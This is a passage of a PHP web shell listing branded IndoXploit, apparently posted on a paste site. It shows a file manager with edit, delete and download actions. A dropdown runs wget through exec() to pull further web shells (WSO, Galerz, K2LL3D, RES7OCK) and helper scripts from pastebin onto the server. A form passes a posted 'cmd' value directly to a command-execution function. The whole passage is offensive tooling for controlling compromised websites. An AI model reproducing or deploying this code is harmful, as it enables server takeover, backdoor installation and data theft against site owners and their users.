  1916. echo "<td class='td_home' ><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1917. echo "<td class='td_home'><center>$dtype</center></td>";
  1918. echo "<td class='td_home'><center>-</center></td>";
  1919. echo "<td class='td_home'><center>$dtime</center></td>";
  1920. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1921. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1922. echo "<td style='padding-left: 15px;'>$act_dir</td>";
  1923. echo "</tr>";
  1924. }
  1925. }
  1926. } else {
  1927. echo "<font color=red>can't open directory.</font>";
  1928. }
  1929. foreach($scandir as $file) {
  1930. $ftype = filetype("$dir/$file");
  1931. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1932. $size = filesize("$dir/$file")/1024;
  1933. $size = round($size,3);
  1934. if(function_exists('posix_getpwuid')) {
  1935. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1936. $fowner = $fowner['name'];
  1937. } else {
  1938. //$downer = $uid;
  1939. $fowner = fileowner("$dir/$file");
  1940. }
  1941. if(function_exists('posix_getgrgid')) {
  1942. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1943. $fgrp = $fgrp['name'];
  1944. } else {
  1945. $fgrp = filegroup("$dir/$file");
  1946. }
  1947. if($size > 1024) {
  1948. $size = round($size/1024,2). 'MB';
  1949. } else {
  1950. $size = $size. 'KB';
  1951. }
  1952. if(!is_file("$dir/$file")) continue;
  1953. echo "<tr class='td_home'>";
  1954. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1955. echo "<td class='td_home'><center>$ftype</center></td>";
  1956. echo "<td class='td_home'><center>$size</center></td>";
  1957. echo "<td class='td_home'><center>$ftime</center></td>";
  1958. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1959. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1960. echo "<td style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1961. echo "</tr>";
  1962. }
  1963. echo "</table>";
  1964. if(!is_readable($dir)) {
  1965. //
  1966. } else {
  1967. echo "<hr>";
  1968. }
  1969.  
  1970. echo"<table align=center>";
  1971. echo"<td>";
  1972. echo"<center>";
  1973. echo"<form action='' method='post'> ";
  1974. echo"<select name='buah' style=padding:4px 10px;>";
  1975. echo"<option value='wso_shell'> WSO Shell </option>";
  1976. echo"<option value='galer_shell'> Galerz Shell </option>";
  1977. echo"<option value='k2_shell'> K2LL3D Shell </option>";
  1978. echo"<option value='r7_shell'> RES7OCK Shell </option>";
  1979. echo"<option value='bin'> Mass Bin identifier </option>";
  1980. echo"<option value='md5'> MD5 Encoder </option>";
  1981. echo"<option value='base64'> Base64 Encode / Decode </option>";
  1982. echo"<option value='remove'> Remove Duplicate Text </option>";
  1983. echo"<option value='separator'> Separator Text </option>";
  1984. echo"<option value='sufpre'> Add Sufix / Prefix Text </option>";
  1985. echo"<option value='joomla_extract'> Jommla Ip Extractor </option>";
  1986. echo"<option value='wordpress_extract'> Wordpress Ip Extractor </option>";
  1987. echo"</select> ";
  1988. echo"<input type='submit' class='btn btn-success btn-sm' name='enter' value='Enter'>";
  1989. echo"</form> ";
  1990.  
  1991. if(isset($_POST['enter'])) {
  1992. if ($_POST['buah'] == 'k2_shell') {
  1993. $exec=exec('wget http://pastebin.com/raw.php?i=HGVTfyA6 -O k2ll3d.php');
  1994. if(file_exists('./k2ll3d.php')){
  1995. echo '<center><a href=./k2ll3d.php> k2ll3d.php </a> Succes mhanx !</center>';
  1996. } else {
  1997. echo 'Fail ! ';
  1998. }
  1999.  
  2000. }elseif ($_POST['buah'] == 'r7_shell') {
  2001. $exec=exec('wget http://pastebin.com/raw.php?i=tXWtZzrb -O res7.php');
  2002. if(file_exists('./res7.php')){
  2003. echo '<center><a href=./res7.php> res7.php </a> Succes mhanx !</center>';
  2004. } else {
  2005. echo 'Fail ! ';
  2006. }
  2007.  
  2008. }elseif ($_POST['buah'] == 'wso_shell') {
  2009. $exec=exec('wget http://pastebin.com/raw.php?i=Tpm5E10g -O wso.php');
  2010. if(file_exists('./wso.php')){
  2011. echo '<center><a href=./wso.php> wso.php </a> Succes mhanx !</center>';
  2012. } else {
  2013. echo 'Fail ! ';
  2014. }
  2015.  
  2016. }elseif ($_POST['buah'] == 'galer_shell') {
  2017. $exec=exec('wget http://pastebin.com/raw.php?i=cXQ2iSY6 -O galerz.php');
  2018. if(file_exists('./galerz.php')){
  2019. echo '<center><a href=./galerz.php> galerz.php </a> Succes mhanx !</center>';
  2020. } else {
  2021. echo 'Fail ! ';
  2022. }
  2023.  
  2024. }elseif ($_POST['buah'] == 'joomla_extract') {
  2025. $exec=exec('wget http://pastebin.com/raw.php?i=tFG4zm9r -O joomlaip.php');
  2026. if(file_exists('./joomlaip.php')){
  2027. echo '<center><a href=./joomlaip.php> joomlaip.php </a> Succes mhanx !</center>';
  2028. } else {
  2029. echo 'Fail !';
  2030. }
  2031.  
  2032. }elseif ($_POST['buah'] == 'wordpress_extract') {
  2033. $exec=exec('wget http://pastebin.com/raw.php?i=NBUDJVCm -O wpip.php');
  2034. if(file_exists('./wpip.php')){
  2035. echo '<center><a href=./wpip.php> wpip.php </a> Succes mhanx !</center>';
  2036. } else {
  2037. echo 'Fail !';
  2038. }
  2039.  
  2040. }elseif ($_POST['buah'] == 'md5') {
  2041. $exec=exec('wget http://pastebin.com/raw.php?i=72XW4nym -O md5.php');
  2042. if(file_exists('./md5.php')){
  2043. echo '<center><a href=./md5.php> md5.php </a> Succes mhanx !</center>';
  2044. } else {
  2045. echo 'Fail !';
  2046. }
  2047.  
  2048. }elseif ($_POST['buah'] == 'base64') {
  2049. $exec=exec('wget http://pastebin.com/raw.php?i=JvbEv9es -O base64.php');
  2050. if(file_exists('./base64.php')){
  2051. echo '<center><a href=./base64.php> base64.php </a> Succes mhanx !</center>';
  2052. } else {
  2053. echo 'Fail !';
  2054. }
  2055.  
  2056. }elseif ($_POST['buah'] == 'sufpre') {
  2057. $exec=exec('wget http://pastebin.com/raw.php?i=MGrMgZ9N -O sufpre.php');
  2058. if(file_exists('./sufpre.php')){
  2059. echo '<center><a href=./sufpre.php> sufpre.php </a> Succes mhanx !</center>';
  2060. } else {
  2061. echo 'Fail !';
  2062. }
  2063.  
  2064. }elseif ($_POST['buah'] == 'bin') {
  2065. $exec=exec('wget http://pastebin.com/raw.php?i=3n1ikxsG -O bin.php');
  2066. if(file_exists('./bin.php')){
  2067. echo '<center><a href=./bin.php> bin.php </a> Succes mhanx !</center>';
  2068. } else {
  2069. echo 'Fail !';
  2070. }
  2071.  
  2072. }elseif ($_POST['buah'] == 'remove') {
  2073. $exec=exec('wget http://pastebin.com/raw.php?i=A0QVwca3 -O remove.php');
  2074. if(file_exists('./remove.php')){
  2075. echo '<center><a href=./remove.php> remove.php </a> Succes mhanx !</center>';
  2076. } else {
  2077. echo 'Fail !';
  2078. }
  2079. }elseif ($_POST['buah'] == 'separator') {
  2080. $exec=exec('wget http://pastebin.com/raw.php?i=He6tvtKx -O separator.php');
  2081. if(file_exists('./separator.php')){
  2082. echo '<center><a href=./separator.php> separator.php </a> Succes mhanx !</center>';
  2083. } else {
  2084. echo 'Fail !';
  2085. }
  2086. }
  2087. }
  2088. echo"</td>";
  2089. echo"<td>";
  2090. echo"<a name=com>";
  2091. echo "<form method='post'>";
  2092. echo "<input type='text' style=padding:4px 10px; name='cmd' placeholder=command><input type='submit' name='do_cmd' value='Excute' class='btn btn-success btn-sm'>";
  2093. echo "</form>";
  2094. if($_POST['do_cmd']) {
  2095. echo "".exe($_POST['cmd'])."";
  2096. }
  2097. echo"</td>";
  2098. echo"</table>";
  2099. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=#18BC9C>IndoXploit</font></a> Recode by :<font color='#18BC9C'> nemat0da </font></center>";
  2100. }
  2101. ?>
  2102. </html>
Add Comment
Please, Sign In to add comment